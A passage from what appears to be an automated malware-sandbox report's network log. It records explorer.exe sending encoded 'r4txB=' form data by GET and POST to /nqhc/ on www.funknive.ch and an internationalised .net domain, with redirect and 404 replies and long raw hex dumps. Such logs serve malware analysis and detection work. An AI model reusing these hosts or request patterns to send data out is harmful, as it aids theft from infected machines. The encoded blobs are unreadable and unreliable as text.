                                                                                                                                                                                    Data Ascii: wbpWamI~oDvAXG4ywoFG3ECiIUBWS0jVX4VveqDyD5JX9G2srQn9iwf0H1ju_2vrzMzfLSxTHGYP1HvfJOlFcSrHebXsXYZkT7gC4P5kWqhzmeJAE(o3cwj1mlkZij4L0PWjI17MlSC4lEW4pLTbbYaVSR4fnkIj3RDjKg_vqJnlcCPoPavldNmSng-TnLDwpNVs34s9C2HggWoa8SI7fBNTUAmSlx-cJeihFpYnOYoMNLzOVNu
                                                                                                                                                                                    Nov 21, 2022 19:22:27.510754108 CET1091OUTData Raw: 6c 72 61 69 6c 66 77 4c 42 6b 66 4a 4d 39 5f 4a 73 55 58 42 58 47 66 54 62 74 55 31 77 6f 52 64 34 70 7a 66 50 77 35 73 67 63 32 36 61 61 52 59 47 6d 57 62 4f 77 68 71 34 65 55 72 4f 6a 74 30 5a 70 4d 34 5f 5a 50 38 46 56 31 55 54 46 53 41 66 4b
                                                                                                                                                                                    Data Ascii: lrailfwLBkfJM9_JsUXBXGfTbtU1woRd4pzfPw5sgc26aaRYGmWbOwhq4eUrOjt0ZpM4_ZP8FV1UTFSAfKFwWDIermYDW4RcXQ42-4iX0PaJTh6GYDHC5wwJzbkT5K3OEqczE2vV8aPeGMH1uizKO90o8caBg4LOC1CP-KVb2UFxlWoZckyvpKtBqo2HyrAw_mHRKnvnkIadlvqOxIZ7-2ANzjI9XHDf9dDQDB0K4I_p3RV~CDH
                                                                                                                                                                                    Nov 21, 2022 19:22:27.527985096 CET1091INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:27 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 162
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Location: https://www.funknive.ch/nqhc/
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                    Nov 21, 2022 19:22:27.528033018 CET1094OUTData Raw: 33 72 48 32 64 7a 44 32 4a 65 32 64 64 4b 62 52 6e 31 78 51 65 67 68 58 58 66 51 43 62 75 65 73 45 48 42 6d 65 4d 6a 4f 5a 67 5f 78 53 71 52 32 65 58 79 72 33 63 32 6a 77 36 35 31 33 6f 66 78 76 4c 77 47 64 30 70 54 30 4e 45 41 2d 5a 69 35 39 69
                                                                                                                                                                                    Data Ascii: 3rH2dzD2Je2ddKbRn1xQeghXXfQCbuesEHBmeMjOZg_xSqR2eXyr3c2jw6513ofxvLwGd0pT0NEA-Zi59iRJViJqsAinEnaWKnnL0ba~WvG52RVqc~YC6kQbYiYB8ljI93DJ4NkZbzPV2MEqZaWgn2Rq8bDpQ(0XCKERROpdYVn6tzCLREqn9a9kNy6KNh7lYFbutuGdlzeBbM3OP~JOxHruJcer5tcvATffDieCFegU3nax1ff
                                                                                                                                                                                    Nov 21, 2022 19:22:27.528053045 CET1096OUTData Raw: 6d 75 4b 4a 50 34 30 6f 50 74 66 78 56 7e 6f 31 66 55 30 31 44 74 76 6e 51 45 4e 35 6d 52 5f 4e 48 6f 2d 38 35 4b 72 42 68 63 72 56 68 30 78 6f 39 70 45 42 34 54 4d 32 33 64 5a 47 56 77 79 77 37 4a 6d 69 67 30 42 52 47 28 30 34 43 57 74 32 2d 32
                                                                                                                                                                                    Data Ascii: muKJP40oPtfxV~o1fU01DtvnQEN5mR_NHo-85KrBhcrVh0xo9pEB4TM23dZGVwyw7Jmig0BRG(04CWt2-2L8erVZbgdhhi3(TKdvpkvJECcwPjEcSZSU2RmOPe4(4D8lG2WqIhwWt6Q5sqVJjMgmkL9EA7FVcdjCduzvwZdrz49bNv0SD7Ksj(FJ0AUVzluGwKH4FPV2FsrtQ71(7sqn6E_jK~ekGqJLcmOCmsMAGgbMscSiA~a
                                                                                                                                                                                    Nov 21, 2022 19:22:27.528269053 CET1106OUTData Raw: 4d 31 46 37 31 73 4a 39 78 4a 6b 32 4b 45 69 4b 4b 4d 49 48 75 44 38 75 5a 44 6e 57 39 68 73 61 46 75 6f 35 67 63 61 73 48 41 6e 62 31 52 6a 46 57 74 33 37 6d 49 78 55 6d 36 62 5a 44 67 51 67 79 70 61 53 2d 53 53 6e 31 45 48 6b 4e 56 32 50 33 69
                                                                                                                                                                                    Data Ascii: M1F71sJ9xJk2KEiKKMIHuD8uZDnW9hsaFuo5gcasHAnb1RjFWt37mIxUm6bZDgQgypaS-SSn1EHkNV2P3ip5FEbkgXjPf~XZaXlWL5ilFlgxSZ6EBR9HxvW0dcneBXG0NnrzLM_vjcprfu_HbTrpz4QBkMTP8Llri(WgjcJlPGHtMaobBqG9ZGtSnJaMz3Edg7QwAdGiyAvTtsiBedRtEve9FihehWAhBwiuaSBGy0XT38e1AuN
                                                                                                                                                                                    Nov 21, 2022 19:22:27.528439999 CET1114OUTData Raw: 66 7e 66 70 58 44 49 45 6d 44 48 61 65 59 6b 55 4e 6a 4a 41 49 59 46 52 42 54 5a 55 71 36 68 6d 47 77 6a 41 6a 35 41 74 6c 54 33 73 73 61 7a 62 5f 4e 36 48 66 41 57 75 6f 39 33 35 36 34 73 7a 6c 35 55 67 45 66 35 4a 4b 4a 45 44 4d 4a 37 4a 48 7a
                                                                                                                                                                                    Data Ascii: f~fpXDIEmDHaeYkUNjJAIYFRBTZUq6hmGwjAj5AtlT3ssazb_N6HfAWuo93564szl5UgEf5JKJEDMJ7JHzEWbzaoKL8NHDnTBemnp50e0aEU-4vEEp0ACxZ1gqfKvHxVGswsCFDpe(Smet8TK30tPARor3vkeCeVtMnhnl1(DCC48MTEekf8e8Gtk7hRaSWO6ckEH(w(RLCnsctx50YqqtjzpVEr2sgJUMWFQoKzxdEXIA5NpZV
                                                                                                                                                                                    Nov 21, 2022 19:22:27.545217037 CET1121OUTData Raw: 6f 64 56 6b 47 54 43 64 5a 7a 41 45 67 55 51 54 67 37 53 7a 38 47 62 78 52 6f 4e 63 67 6e 55 67 5a 38 61 66 33 50 61 4d 30 73 2d 52 76 38 4a 71 71 37 39 32 68 72 57 50 4c 31 61 74 76 38 66 72 4a 31 30 5a 30 43 62 79 5f 6b 37 77 59 36 5f 64 74 63
                                                                                                                                                                                    Data Ascii: odVkGTCdZzAEgUQTg7Sz8GbxRoNcgnUgZ8af3PaM0s-Rv8Jqq792hrWPL1atv8frJ10Z0Cby_k7wY6_dtc7~PfVPrMkq4KJaoQbQCrx0tgNM9GhhNXRkwixGL(pLMPF9voM4UDmPA4gJAlKtWmq0a7vf9BgSIPC1tnSydA6tEAmbSGJ0OnKmzf80mntCu~1odfJX_A5DOMYqohrqQMqEC9VAjYv8IiO3MzoFn2MT6bBMtq_(wf6
                                                                                                                                                                                    Nov 21, 2022 19:22:27.545243025 CET1122OUTData Raw: 37 61 4d 49 6b 35 59 64 74 48 36 4d 57 44 4a 6c 61 4f 39 57 43 48 52 75 7a 44 71 6b 65 74 7a 6b 75 41 65 53 4e 39 45 78 74 36 43 36 50 78 7a 63 4d 37 70 6a 4c 6a 67 70 44 4c 35 61 70 6a 34 67 75 44 58 59 58 59 4d 6c 31 69 32 75 63 74 42 65 4a 32
                                                                                                                                                                                    Data Ascii: 7aMIk5YdtH6MWDJlaO9WCHRuzDqketzkuAeSN9Ext6C6PxzcM7pjLjgpDL5apj4guDXYXYMl1i2uctBeJ2vrl5pYT2E6XjT(rO5t61rp4p2e16RqSdkF-NaE7HSpWyVQm9MdGnCeX4BCRgs5keDO8vXCJFrbOhF6VVS5cUOMe~3Tc~MiN2BGhyT5oGa(LSNxXU6toOPYskvErnHO0XlVUbaV08pBOeDPU(OOnzPI7BYPS~o7JSL
                                                                                                                                                                                    Nov 21, 2022 19:22:27.545319080 CET1127OUTData Raw: 6a 75 48 32 39 55 58 6a 34 59 58 75 55 57 78 79 33 52 33 4c 54 35 56 4e 43 75 32 4d 6e 39 6a 54 53 6a 7a 52 57 79 70 30 5a 64 59 42 30 36 38 49 52 55 77 37 49 76 6e 6a 34 6f 4f 6f 59 43 52 49 70 61 32 46 71 34 54 66 76 28 72 7e 76 79 37 4e 6e 6b
                                                                                                                                                                                    Data Ascii: juH29UXj4YXuUWxy3R3LT5VNCu2Mn9jTSjzRWyp0ZdYB068IRUw7Ivnj4oOoYCRIpa2Fq4Tfv(r~vy7NnkzsWmsL07L8fcHp1y4be2K1156P7F4q724JkAPuhmKW0S8iIbwnmAjN7kTmhzch2P4X9eSkebHNpc_38ltZrlansy2Pw8q1DJkWMgJBXtTOOGf0Pob2e(QxD4SBOWI1mzSnpx9Q05MNmwcgdEUdza8KDG4GhXd5RKr
                                                                                                                                                                                    Nov 21, 2022 19:22:27.545505047 CET1130OUTData Raw: 4d 32 73 77 56 4e 4a 62 55 32 41 6a 41 32 77 59 4c 59 4d 67 53 68 4b 41 42 28 46 74 72 53 5f 47 57 62 77 58 57 28 61 7e 31 28 4f 4e 32 58 47 52 33 31 50 75 4a 79 50 72 41 53 53 34 76 63 36 4b 73 66 68 32 62 6e 51 5a 43 74 38 6b 7a 33 66 58 7a 6e
                                                                                                                                                                                    Data Ascii: M2swVNJbU2AjA2wYLYMgShKAB(FtrS_GWbwXW(a~1(ON2XGR31PuJyPrASS4vc6Ksfh2bnQZCt8kz3fXznYmchEbpKrFLMKziwCBlmUYlKEVDTKWNYPaS8rrg9zUohs3t6Gpf2iouT1UvV5hWfH~RYuvlubPH0dAnJ88PzWx_ko8UECX2arV6p7XWGaypzjh8uUWC(7Li(6lbFQrJuwbMq2GWu1HopPnwfQgjrNfs~pa1iUmogs


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    42192.168.11.2049867185.101.158.23980C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:29.555793047 CET1131OUTGET /nqhc/?r4txB=sPoIw5t6pqr53t/oApVsYQPYeQSIkYstTEU7jq7wUoyBdiYMXjDOpQvDe6hGJRv5cGRC4OofJ74gnHLDZXk1GBAfNVZPB7Yr2A==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.funknive.ch
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:22:29.572772980 CET1132INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:29 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 162
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Location: https://www.funknive.ch/nqhc/?r4txB=sPoIw5t6pqr53t/oApVsYQPYeQSIkYstTEU7jq7wUoyBdiYMXjDOpQvDe6hGJRv5cGRC4OofJ74gnHLDZXk1GBAfNVZPB7Yr2A==&1b=S8jD
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    43192.168.11.204986850.87.192.14480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:43.178184032 CET1133OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.xn--29-oj9ik7b890b.net
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.xn--29-oj9ik7b890b.net
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.xn--29-oj9ik7b890b.net/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 56 72 70 38 63 62 49 45 70 59 55 42 65 6b 59 75 6a 4a 7e 35 6c 71 64 30 52 6b 4d 59 64 4c 28 34 4e 50 69 44 54 33 55 41 44 4b 7e 33 45 44 73 37 6c 6a 74 4e 65 36 28 6d 77 56 61 51 53 51 59 35 4d 32 77 6e 56 6a 56 31 78 61 66 53 6e 6b 65 71 31 4e 50 55 50 43 47 79 36 77 45 39 69 78 5a 4b 4c 6e 51 42 7e 59 6e 7a 48 77 69 67 57 42 35 57 72 67 68 71 50 65 68 34 4e 42 63 31 70 57 4c 57 47 64 65 39 34 44 66 76 77 68 69 54 45 38 4d 54 49 41 45 4b 52 39 72 78 59 6f 62 6e 33 61 6b 2d 7a 78 4e 57 55 72 53 50 79 7a 5a 44 77 57 4a 43 51 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=Vrp8cbIEpYUBekYujJ~5lqd0RkMYdL(4NPiDT3UADK~3EDs7ljtNe6(mwVaQSQY5M2wnVjV1xafSnkeq1NPUPCGy6wE9ixZKLnQB~YnzHwigWB5WrghqPeh4NBc1pWLWGde94DfvwhiTE8MTIAEKR9rxYobn3ak-zxNWUrSPyzZDwWJCQA).
                                                                                                                                                                                    Nov 21, 2022 19:22:43.512882948 CET1135INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:43 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                    Link: <http://xn--299aa717y.xn--3e0b707e/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                                                                                    X-nginx-cache: WordPress
                                                                                                                                                                                    Content-Length: 11649
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6d 8f ec c8 75 de 67 cd af a8 db 8b dd 99 96 ba d8 24 fb bd 7b 7a 64 ed 6a b5 16 a2 b5 85 bd 2b 1b 81 56 b8 a8 26 0f c9 da 29 56 d1 c5 e2 74 f7 8e 07 10 10 c7 f0 1b 9c 04 96 61 23 90 02 1b 88 e1 04 f9 22 24 0a a0 0f 49 7e 90 f6 ea 3f e4 14 d9 ef c3 9e e9 3b f7 5e 19 89 76 5e 48 d6 a9 73 9e f3 9c e7 3c 97 cf be fd fb 1f 7c fa af bf ff 21 49 4c 2a ae ce 2e ed 8b 08 26 e3 69 e3 5a d1 7f f5 49 c3 c6 80 85 57 67 5f bb 4c c1 30 12 24 4c e7 60 a6 8d 1f 7c fa 1d 3a 6c 90 f6 e6 46 b2 14 a6 8d 1b 0e f3 4c 69 d3 20 81 92 06 24 66 ce 79 68 92 69 08 37 3c 00 5a 1e 5a 84 4b 6e 38 13 34 0f 98 80 a9 57 e2 ec c0 9c 6b 35 53 26 3f df 80 9c 4b c5 65 08 8b 16 91 2a 52 42 a8 f9 79 59 62 b8 11 70 f5 eb bf fe fb 97 3f fb c5 cb 7f fe f1 97 ff f4 bf c8 cb 9f ff 9f 97 3f fb 13 f2 f2 cf fe 9e bc fc bb 3f 7d f9 b3 bf 22 ef bd 33 f4 3d 6f 42 62 15 2b a3 b2 cb 76 55 75 76 29 b8 bc 26 1a c4 f4 3c 94 39 cd 34 44 60 82 e4 9c 24 f8 35 3d 6f b7 17 92 52 7f 34 62 6c e0 0d 96 8e 3d 75 c0 9d 0d dc 01 54 dd 37 f5 0d 26 0c 68 c9 0c 34 88 59 66 a8 03 cb 32 c1 03 66 b8 92 6d 9d e7 df 58 a4 02 af 6c df 69 63 c5 83 bc a7 d9 1f 15 6a 42 7e fd 93 ff f5 e5 df fc b4 51 b5 6d 24 c6 64 e3 87 7a b7 23 80 b0 dd 78 93 0c be fc ab bf f9 d5 2f 7f fc ca 44 02 95 a6 b8 9d 7c 97 51 1e 68 9e 99 ab b3 39 ee 4b cd 9d 17 f3 0c 52 f5 39 7f 0e c6 70 19 e7 64 4a 6e 1b 33 96 c3 0f b4 68 8c cb 1e f9 f8 b3 f6 67 ed dc 99 3b 4a c7 9f b5 79 ca 62 c8 3f 43 70 0d 9f b5 cb e2 cf da 5e d7 71 1d f7 b3 f6 c0 5f 0c fc cf da 8d 56 03 16 06 eb 9d 4c c6 78 c8 6f e2 a7 e1 61 61 89 86 ef 0f 2b 40 fc b2 67 55 e8 00 1a e3 db 06 3a 10 45 2c cb 56 f8 25 fc 71 55 3e 6b cf 33 ca 65 20 8a d0 b6 fd 3c 2f 03 25 00 c5 4d 01 ce ee a4 5c 3a 9f e7 df bc 01 3d ed 3b 9e e3 35 ee ee 26 67 ed af 3f 23 9f 26 3c 27 11 17 40 f0 cd 0a a3 68 0c 12 34 12 08 c9 d7 db 67 cf a2 42 06 76 a3 17 d0 62 2d d3 bc bd 61 9a c8 96 6e a9 16 9f 32 27 d0 80 99 1f 0a b0 5b b9 68 04 4c de b0 bc d1 6c 65 53 ee c4 60 3e 50 d2 a0 6c ef bd b7 7b ba 68 f8 61 a3 39 59 03 93 1c a1 57 c0 6c fa dc 68 5c 9a 13 69 95 7e 90 30 fd 81 0a a1 05 d3 8b cc 09 70 0e fd 09 04 e6 c2 6d b9 2d ee cc 79 68 12 7c 27 c0 e3 c4 60 47 07 87 10 9f 5a 7c e6 58 27 2e 2f 0c 8e d6 82 26 a6 bb 4d cc 34 ea db cc b0 1f 7c f2 bd 8b 66 73 a2 c1 14 5a 92 a7 e3 9a 15 2e 4c a7 d3 3d ec bb cd 60 c1 05 54 63 99 fb 4a 55 a6 45 19 8c 93 eb
                                                                                                                                                                                    Data Ascii: rmug${zdj+V&)Vta#"$I~?;^v^Hs<|!IL*.&iZIWg_L0$L`|:lFLi $fyhi7<ZZKn84Wk5S&?Ke*RByYbp???}"3=oBb+vUuv)&<94D`$5=oR4bl=uT7&h4Yf2fmXlicjB~Qm$dz#x/D|Qh9KR9pdJn3hg;Jyb?Cp^q_VLxoaa+@gU:E,V%qU>k3e </%M\:=;5&g?#&<'@h4gBvb-an2'[hLleS`>Pl{ha9YWlh\i~0pm-yh|'`GZ|X'./&M4|fsZ.L=`TcJUE
                                                                                                                                                                                    Nov 21, 2022 19:22:43.512993097 CET1136INData Raw: 60 8a 0a 38 21 44 b8 1d e3 98 65 06 d3 86 55 aa fd 39 43 39 ab cc 16 b3 12 ae ea f3 f7 97 9f b2 f8 f7 58 0a 17 8d 04 18 ca f9 43 f7 47 96 1d c8 f0 83 84 8b f0 c2 20 0f a5 2f d4 f4 5b 5a b3 e5 45 23 12 cc ba ac 72 55 13 bb e5 45 96 29 6d f2 e9 2d
                                                                                                                                                                                    Data Ascii: `8!DeU9C9XCG /[ZE#rUE)m-)8"|1~Sw/#@&o|E[4oytVf>&HpvK;Ve4w]L4p{fV?h8h{ngn5zG{7yguzV?lMY
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513070107 CET1137INData Raw: 51 07 ef 25 39 09 cb e9 76 19 b7 19 0b 43 2e e3 b1 e7 f8 3d 48 89 ef 74 06 f8 9e a4 4c c7 5c 52 a3 b2 b1 bb 3e cc 14 72 4c c7 ee 23 9c 12 60 16 71 9f 4d e2 1d 34 6e 25 fe bd 48 e7 5e a4 7b 2f d2 bb 17 e9 9f 36 d2 23 ac 51 1b 16 a3 e3 93 03 15 79
                                                                                                                                                                                    Data Ascii: Q%9vC.=HtL\R>rL#`qM4n%H^{/6#QyN*.mpW9B0}*KWvP,+-3TPqunc@FB13~tq$81c?s;A%RF3GJ"@,h.xuCwj<O@E
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513151884 CET1138INData Raw: f7 f3 f3 8c 05 40 67 60 e6 00 f2 5e dd de ed 9d 93 07 1a df 28 09 0b d1 35 56 af db 99 d2 f8 3d 76 27 81 e0 d9 58 a3 36 17 5e b6 68 ed fc 37 cb 2b 9a 31 93 8c b9 c4 f5 5e f4 dc 77 9b 93 04 2c d3 31 26 4c 52 74 21 97 63 6a bf d5 0d e8 48 a8 f9 38
                                                                                                                                                                                    Data Ascii: @g`^(5V=v'X6^h7+1^w,1&LRt!cjH8ar02~fi54S0iH#V.9PB;aVs-vUvM0*l-AbM=d*nF|x],B4+.[0%c?wIpQ
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513215065 CET1140INData Raw: c3 ca b9 0c ff b7 be ab 01 3c 9a 7b 32 7c 0e 81 92 e8 b5 e5 e3 e8 9b d4 93 c1 0d 68 c3 4f c2 5e 67 3e b0 1e cd 53 4c 78 5c 93 fa c4 d3 80 1f 52 a3 36 ef 34 d8 07 74 a8 4b bb 07 1a 29 69 68 ce bf 40 d8 3c 65 42 8c 89 a7 21 3d 9e 94 42 c8 8b 14 b3
                                                                                                                                                                                    Data Ascii: <{2|hO^g>SLx\R64tK)ih@<eB!=B=)Nyuf X][s3o)Xy/siL*z_py1`Fbm>Q3Te>g2o`VHS>`0B=(1y 'U<Pcx^s""u0y.cJ}wL\
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513283968 CET1141INData Raw: 4d f2 8c a7 99 d2 86 49 b3 c2 08 96 4c e2 65 c1 f3 84 a2 e4 cb 13 e1 0e cb 6a 90 e7 09 37 70 22 5c 99 5b 83 91 31 01 34 c3 5d 9d 88 b3 c9 af c1 ba e1 37 3c a4 1a c2 13 b1 36 f9 35 58 a2 48 b9 54 c5 1a 14 97 23 e3 53 67 ad ad 7d bc 07 4b 67 e8 c8
                                                                                                                                                                                    Data Ascii: MILej7p"\[14]7<65XHT#Sg}Kg'(K:XodjevUGqBg@Hi*6XpJhh2<u)UvNH,uZb5k<fjrVopDsCg\N7TC
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513348103 CET1142INData Raw: 4d cf 51 dd 73 d2 46 86 79 a0 79 66 08 aa 7c 62 4b 2e 03 51 84 d8 6c 86 5b b9 ce db 92 dd f0 98 19 ae 64 fb 86 c3 dc 49 b9 74 3e af 1a 06 7e b7 d3 71 a3 7e a7 17 f5 82 d9 28 ec 81 0b d5 f4 88 53 96 d3 6d 35 b5 d5 f4 f3 fc fc 0a e5 2b 49 bd 05 76
                                                                                                                                                                                    Data Ascii: MQsFyyf|bK.Ql[dIt>~q~(Sm5+Iv4U!y?Y;|X~T^^:N**%n[MSkf`C8il$rd2vrt$zZs|1eRu~cF'}z;,YdIMMwy$ 7uw+
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513415098 CET1144INData Raw: ca ef bf 11 bf cf 50 46 aa 50 b0 18 7e 6b ed be 6b 76 7f d0 db b3 ed c3 06 77 9d 3e 56 74 7b 2b 04 ff 64 bf 0f ef f9 dd 1b f5 dd c1 b0 db f1 3a 03 bf b7 83 f3 ad 07 70 bc 15 d5 76 8d 3c 1b cd d0 33 40 b8 f4 a7 8d e7 aa d0 01 7c a4 59 96 f0 a0 41
                                                                                                                                                                                    Data Ascii: PFP~kkvw>Vt{+d:pv<3@|YAT.W0zQ9dcq=yQ:n4=jQbdCO)?#aq"A"nxg\pr%" 2cBG-&DoQyFBG#!!e?cuu
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513490915 CET1145INData Raw: f2 d5 30 85 ca 4b 07 cf b8 0c 01 e7 a0 de fd e5 94 49 15 f6 2b 81 87 9c 09 15 d7 f9 67 c5 d4 e2 ed 1a 6f df 63 5f fe e5 7f 2b 3d 56 4b e7 d5 9d 57 8d 5a f9 ea 89 06 3a 62 c7 d3 7c 95 31 93 10 5c d6 c7 5e 87 78 9e 33 14 7d c7 a3 7d a7 43 3d 6a df
                                                                                                                                                                                    Data Ascii: 0KI+goc_+=VKWZ:b|1\^x3}}C=j;>b>={*sT>/mT_ 6q:c1PsL:/_RR*Ir}<&)hjUe6xBpy}QI?16K:?l3Zp|b#v^v
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513545036 CET1146INData Raw: fe dd d9 63 2a 8c 23 15 14 f9 4a 0b 16 5c 5b e7 ca 10 5d 2d 14 aa f2 0e 00 ec 08 c3 0a a3 0e 19 ed 48 22 95 5c 65 af aa bb dd 6e 79 0e 79 9e 09 b6 1c 93 d2 cc 65 28 52 d2 a0 ab bf 00 1c 06 d2 3d 09 6d 97 32 20 20 c2 63 6f 35 2b 0e 00 74 9d 53 4d
                                                                                                                                                                                    Data Ascii: c*#J\[]-H"\enyye(R=m2 co5+tSMjJ(*]7+U7\@HTJ-Kk]4~^h*0MC?E!S)HQz:Lr2.Ie|3wC#fT&A: )V


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    44192.168.11.204986950.87.192.14480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:45.370502949 CET1147OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.xn--29-oj9ik7b890b.net
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.xn--29-oj9ik7b890b.net
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.xn--29-oj9ik7b890b.net/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 56 72 70 38 63 62 49 45 70 59 55 42 66 45 6f 75 6c 6f 7e 35 77 61 64 37 64 45 4d 59 50 4c 28 38 4e 50 75 44 54 32 67 51 43 38 75 33 4b 43 63 37 69 6e 35 4e 64 36 28 6d 28 31 61 52 57 51 59 79 4d 32 4d 46 56 6d 74 31 78 61 62 53 6d 57 36 71 69 4e 50 62 62 79 47 78 39 77 45 38 6d 78 5a 51 4c 6e 4e 67 7e 64 33 7a 48 45 61 67 48 7a 42 57 38 43 5a 70 59 2d 68 2d 50 42 63 30 6a 32 4c 6d 47 64 53 44 34 43 58 56 77 51 57 54 46 64 73 54 4a 41 45 46 45 64 72 79 46 34 61 5f 6d 72 64 74 79 6a 68 76 45 49 4f 72 71 53 4a 52 6b 57 55 47 4b 45 48 5a 64 56 33 78 43 58 45 78 4f 70 32 44 55 68 78 44 70 2d 45 47 5a 43 61 4e 62 47 35 67 78 50 74 61 4b 39 44 51 55 36 6d 6b 6b 76 30 41 41 37 62 72 41 75 45 6c 6b 4e 4f 52 51 64 42 41 6b 69 7a 35 7e 6b 68 6c 36 49 62 58 64 73 63 63 58 72 46 4a 63 52 50 78 64 44 33 70 73 37 55 4d 6e 63 6f 42 46 5f 36 6f 70 75 65 33 6f 67 73 75 72 37 6c 72 33 41 6b 36 4b 58 7a 5f 77 4a 41 69 77 49 6c 47 28 2d 67 33 75 31 35 53 36 5a 79 65 38 57 56 69 54 65 33 5a 69 71 47 52 67 43 6a 76 56 66 4a 6c 4c 56 4c 6e 47 50 56 59 66 5a 48 49 7a 41 51 53 78 37 49 37 4a 4d 33 61 63 56 78 71 64 79 30 61 67 55 52 67 6f 50 44 44 58 67 58 32 77 78 44 6b 54 53 70 78 46 37 39 49 58 39 51 37 54 65 4d 37 6e 5f 51 48 62 4b 51 33 54 4a 73 72 74 4d 66 78 58 2d 33 4f 66 61 4c 69 